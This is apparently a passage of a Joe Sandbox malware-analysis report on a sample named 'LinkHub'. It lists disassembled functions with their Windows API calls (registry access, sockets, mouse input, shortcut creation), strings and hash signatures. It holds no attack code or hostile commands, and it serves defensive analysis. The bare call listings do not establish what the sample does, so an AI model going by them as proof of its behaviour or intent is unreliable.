API String ID: 1424370930-2873401336
Opcode ID: 73fa422f344a69e77eaad67da28ff5d1522782b0af62a12d75fd791d86445b0c
Instruction ID: 48d380d78c98e86826a15d639e662e921bee28f368f787c7b03c44c1c04ddd3b
Opcode Fuzzy Hash: 73fa422f344a69e77eaad67da28ff5d1522782b0af62a12d75fd791d86445b0c
Instruction Fuzzy Hash: D421B231A043459FDF308F69AC04A9A77E8BF55764F200B29F9A1F32D0D7B1A884DB50

Function 00E64B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DD78B1
Part of subcall function 00DD7873: GetStockObject.GDI32(00000011), ref: 00DD78C5
Part of subcall function 00DD7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DD78CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E64BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E64BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E64BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E64BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E64BE3

Strings

Msctls_Progress32, xrefs: 00E64B81

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 9e3e49586362cd2bb1414a5e4bc153790cb3803223f43441d106d0e426adc6f3
Instruction ID: c757e1fb28c8bd5e6661380a1e49352340e012d9d613307861ca1bea96b4678e
Opcode Fuzzy Hash: 9e3e49586362cd2bb1414a5e4bc153790cb3803223f43441d106d0e426adc6f3
Instruction Fuzzy Hash: 411193B2540219BEEF118E65DC85EE77F9DEF09798F015111F608B20A0CA71DC219BA4

Function 00E36078 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00E3608D
_memcmp.LIBVCRUNTIME ref: 00E360AB
_memcmp.LIBVCRUNTIME ref: 00E360BE
_memcmp.LIBVCRUNTIME ref: 00E360D6
_memcmp.LIBVCRUNTIME ref: 00E360EE

Strings

j`, xrefs: 00E3609B

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _memcmp
String ID: j`
API String ID: 2931989736-1521845545
Opcode ID: a1b9d7d7dede799ffb686cd0ca619c03439070ee474ef68aeee9d8c8d1e872be
Instruction ID: 4243cc26ed48631f013b5e256e4cc5c07d20f6bf65d13e4e224659cb0970528c
Opcode Fuzzy Hash: a1b9d7d7dede799ffb686cd0ca619c03439070ee474ef68aeee9d8c8d1e872be
Instruction Fuzzy Hash: 330152A560070AFBD62866319C47EBB775DDE5039CF05D025FE0DBA241E761EE10C6B1

Function 00E3E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E3E328
LoadStringW.USER32(00000000), ref: 00E3E32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E3E345
LoadStringW.USER32(00000000), ref: 00E3E34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E3E390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00E3E36D

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: f148f077a1dc626eafaa49e33ba83a946364b7b23c52c64b091b04a9460e1af1
Instruction ID: e4cd859b916a020a52758d7ad7a6ddc72fab50c751cb5f29dfefab946c71c715
Opcode Fuzzy Hash: f148f077a1dc626eafaa49e33ba83a946364b7b23c52c64b091b04a9460e1af1
Instruction Fuzzy Hash: 9C014FF2A04208BFE71197A5DD89EEB776CD708340F404591F746F6041E6B49E888B71

Function 00E41312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00E41322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00E41334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00E41342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00E41350
CloseHandle.KERNEL32(00000000), ref: 00E4135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 00E4136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00E41376

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 7f1cdc03a4333568e6b62d603302565288310fac3e6b03f621a1b4001beb3c92
Instruction ID: 40f303b909196d5ae4ba1910a05500e6a1359eed9c12e94d1d046a8979d2def0
Opcode Fuzzy Hash: 7f1cdc03a4333568e6b62d603302565288310fac3e6b03f621a1b4001beb3c92
Instruction Fuzzy Hash: D0F01932646602AFD7411F55FE49BC6BB39BF05746F802021F101A18B087B4A4A8CF90

Function 00E526BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E5281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E5283E
WSAGetLastError.WSOCK32 ref: 00E5284F
htons.WSOCK32(?,?,?,?,?), ref: 00E52938
inet_ntoa.WSOCK32(?), ref: 00E528E9

Part of subcall function 00E3433E: _strlen.LIBCMT ref: 00E34348

Part of subcall function 00E53C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00E4F669), ref: 00E53C9D

_strlen.LIBCMT ref: 00E52992

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: b5b0d10cd95a192a51f095966002bbf5bfb868ff6fc5235acadcdfea4c805a2e
Instruction ID: 4803d6a3a13c69c324897332e4c9ec786c838d672c42fab4a9ed7b45cca466af
Opcode Fuzzy Hash: b5b0d10cd95a192a51f095966002bbf5bfb868ff6fc5235acadcdfea4c805a2e
Instruction Fuzzy Hash: B3B1E431604300AFD324DF24C885E2AB7E5EF89318F54994DF9565B3A2DB31ED49CBA1

Function 00E00527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00E0042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E00446
__allrem.LIBCMT ref: 00E0045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E0047B
__allrem.LIBCMT ref: 00E00492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E004B0

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
Instruction ID: cb0a672d1bdb306e637fe5b9b1ebf090b2b6effe0d0fc438157398802e4911fd
Opcode Fuzzy Hash: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
Instruction Fuzzy Hash: E3811A71600B069BD725AF68CC81BAE73E9EF54324F24612EF661F72C1EB74D9808B54

Function 00E06571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00DF8649,00DF8649,?,?,?,00E067C2,00000001,00000001,8BE85006), ref: 00E065CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E067C2,00000001,00000001,8BE85006,?,?,?), ref: 00E06651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E0674B
__freea.LIBCMT ref: 00E06758

Part of subcall function 00E03B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DF0165,?,?,00E411D9,0000FFFF), ref: 00E03BC5

__freea.LIBCMT ref: 00E06761
__freea.LIBCMT ref: 00E06786

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 043c3413a71f93103f620ac534a9e5f897f23dd53d5434a45c20a20cc913134e
Instruction ID: 26898ac99e6f9455cd098db82646cb6856f4023a5536c9ab7d9053383bf4bb98
Opcode Fuzzy Hash: 043c3413a71f93103f620ac534a9e5f897f23dd53d5434a45c20a20cc913134e
Instruction Fuzzy Hash: A5510872600216AFDB244F64CC41FBB77A9EB40758F18566AFC04F61C0EB75DDE086A0

Function 00E5C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

Part of subcall function 00E5D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E5C10E,?,?), ref: 00E5D415
Part of subcall function 00E5D3F8: _wcslen.LIBCMT ref: 00E5D451
Part of subcall function 00E5D3F8: _wcslen.LIBCMT ref: 00E5D4C8
Part of subcall function 00E5D3F8: _wcslen.LIBCMT ref: 00E5D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E5C72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E5C785
RegCloseKey.ADVAPI32(00000000), ref: 00E5C7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E5C7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E5C853
RegCloseKey.ADVAPI32(?), ref: 00E5C85F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: d93ee53502b659070c7469f954a78cb6c3e0d0a672119540124e881116b84ff4
Instruction ID: bce3ec5e3baa45600db691c3543a2ca38b156b53005eb4472b7605f53933364d
Opcode Fuzzy Hash: d93ee53502b659070c7469f954a78cb6c3e0d0a672119540124e881116b84ff4
Instruction Fuzzy Hash: 9E818F30208341AFC714DF24C895E2ABBE5FF88308F14999DF4595B292DB31ED49CBA1

Function 00E3009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00E300A9
SysAllocString.OLEAUT32(00000000), ref: 00E30150
VariantCopy.OLEAUT32(00E30354,00000000), ref: 00E30179
VariantClear.OLEAUT32(00E30354), ref: 00E3019D
VariantCopy.OLEAUT32(00E30354,00000000), ref: 00E301A1
VariantClear.OLEAUT32(?), ref: 00E301AB

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 86dc548c8573a641cf43d5c3f381ccf9dcb9b328cda27ff631f5ae7580104876
Instruction ID: 9c470ca6b588545db3b30313ada95d137533d43711cd750d2d801729d92d80b0
Opcode Fuzzy Hash: 86dc548c8573a641cf43d5c3f381ccf9dcb9b328cda27ff631f5ae7580104876
Instruction Fuzzy Hash: 2D510B35600310EACF64AB6498AD76ABBE5EF45310F14A447F905FF2A7DB709C44CB61

Function 00E46ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E46F21
CoInitialize.OLE32(00000000), ref: 00E4707E
CoCreateInstance.OLE32(00E70CC4,00000000,00000001,00E70B34,?), ref: 00E47095
CoUninitialize.OLE32 ref: 00E47319

Strings

.lnk, xrefs: 00E46EFF, 00E46F69, 00E47025

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 0e93d91dfee998d5e75a52970583851b6d77685e1c64d77d81170aa2cccaa0b8
Instruction ID: 769219ebb75f27f65d956ab393abdc7e5103feaa9bb5f2c6db16a15d439e3dcd
Opcode Fuzzy Hash: 0e93d91dfee998d5e75a52970583851b6d77685e1c64d77d81170aa2cccaa0b8
Instruction Fuzzy Hash: 44D13971608201AFC304EF24D881D6BB7E8EF95708F50495EF5869B262DB71ED09CBA2

Function 00E68C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00E2FBEF,00000000,?,?,00000000,?,00E139E2,00000004,00000000,00000000), ref: 00E68CA7
EnableWindow.USER32(?,00000000), ref: 00E68CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00E68D2C
ShowWindow.USER32(?,00000004), ref: 00E68D40
EnableWindow.USER32(?,00000001), ref: 00E68D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00E68D8A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 4e28f40fec6b70b89a493c81f994e62c5e65ca498f5213aae24f1d7cf28beb2c
Instruction ID: 713b07f5f74769f2ae6255b921c243e9cde118b9d7b6b309a5f9e12dda5d882d
Opcode Fuzzy Hash: 4e28f40fec6b70b89a493c81f994e62c5e65ca498f5213aae24f1d7cf28beb2c
Instruction Fuzzy Hash: 9A412E307412449FDB25CF24EA95FA27BF0FB49748F1412A9EA087B1B2C7716849CB61

Function 00E52D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00E52D45

Part of subcall function 00E4EF33: GetWindowRect.USER32(?,?), ref: 00E4EF4B

GetDesktopWindow.USER32 ref: 00E52D6F
GetWindowRect.USER32(00000000), ref: 00E52D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00E52DB2
GetCursorPos.USER32(?), ref: 00E52DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E52E3C

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: ff58bd5cd3bfc0a6b379e370e65a74a7591e79a39cb307600a15534c1285cc3c
Instruction ID: 799ffbb464eb1182a5e67686a07741c521c41dcca173e7139712256141468d47
Opcode Fuzzy Hash: ff58bd5cd3bfc0a6b379e370e65a74a7591e79a39cb307600a15534c1285cc3c
Instruction Fuzzy Hash: BB31EF72A09315AFC720DF14DC49B9BBBA9FB85354F00091EF985B7191DB71E908CB92

Function 00E355E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00E355F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E35616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E3564E
_wcslen.LIBCMT ref: 00E3566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E35674
_wcsstr.LIBVCRUNTIME ref: 00E3567E

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 9bbb4123ba3a6489a635fcfcac3fadc3576e5df7325438cea25af5c5c30cf064
Instruction ID: f34baa395652adeb96be325e06c2ea9dd509bc184bf6586e1de61d6f7cc11847
Opcode Fuzzy Hash: 9bbb4123ba3a6489a635fcfcac3fadc3576e5df7325438cea25af5c5c30cf064
Instruction Fuzzy Hash: 17213772604604BBEB155B25EC0AE7B7FA8DF44750F158029F905EA191EAA1DC40C6B0

Function 00E46263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DD55D1,?,?,00E14B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DD5871

_wcslen.LIBCMT ref: 00E462C0
CoInitialize.OLE32(00000000), ref: 00E463DA
CoCreateInstance.OLE32(00E70CC4,00000000,00000001,00E70B34,?), ref: 00E463F3
CoUninitialize.OLE32 ref: 00E46411

Strings

.lnk, xrefs: 00E462BB, 00E46306, 00E463CA

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: b07971cb52f8840adb13f1d279614fcce9aedee585adfd85e2e02a580d5f2347
Instruction ID: d666f7e3ae6847fd5accf81091e7995140cbdaf8ec7075adf972460e678c00e0
Opcode Fuzzy Hash: b07971cb52f8840adb13f1d279614fcce9aedee585adfd85e2e02a580d5f2347
Instruction Fuzzy Hash: B8D13371A042019FC714DF25D484A2ABBF5FF8A714F14985DF889AB361CB31EC45CBA2

Function 00DF36F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00DF36E9,00DF3355), ref: 00DF3700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DF370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DF3727
SetLastError.KERNEL32(00000000,?,00DF36E9,00DF3355), ref: 00DF3779

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 83177fed5e75061524e52d4ee77c95d6b7ffd1fa17db8090067e0bd48ac3d031
Instruction ID: b56b39ebe9a562e4011bf01970cf1377bc23db66ca5111afff44e90d8f2aa6e1
Opcode Fuzzy Hash: 83177fed5e75061524e52d4ee77c95d6b7ffd1fa17db8090067e0bd48ac3d031
Instruction Fuzzy Hash: C60128B264D3292EE62537B6BDC65772A95EB04771733422BF710901F0EF918D165170

Function 00E030E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00E02908,00E99B48,0000000C,00DF3268,00000001,?,?), ref: 00E030EB
_free.LIBCMT ref: 00E0311E
_free.LIBCMT ref: 00E03146
SetLastError.KERNEL32(00000000), ref: 00E03153
SetLastError.KERNEL32(00000000), ref: 00E0315F
_abort.LIBCMT ref: 00E03165

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
